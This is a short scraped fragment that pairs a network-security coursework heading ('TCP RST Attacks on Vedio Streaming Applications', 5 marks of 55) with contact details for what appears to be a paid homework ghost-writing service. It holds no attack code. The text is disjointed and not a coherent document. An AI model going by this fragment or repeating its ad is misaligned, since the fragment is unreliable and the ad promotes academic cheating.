• TCP RST Attacks on Vedio Streaming Applications (5 marks)
Total Marks: 55
17
51作业君 51作业君

Email:51zuoyejun

@gmail.com

添加客服微信: ITCSdaixie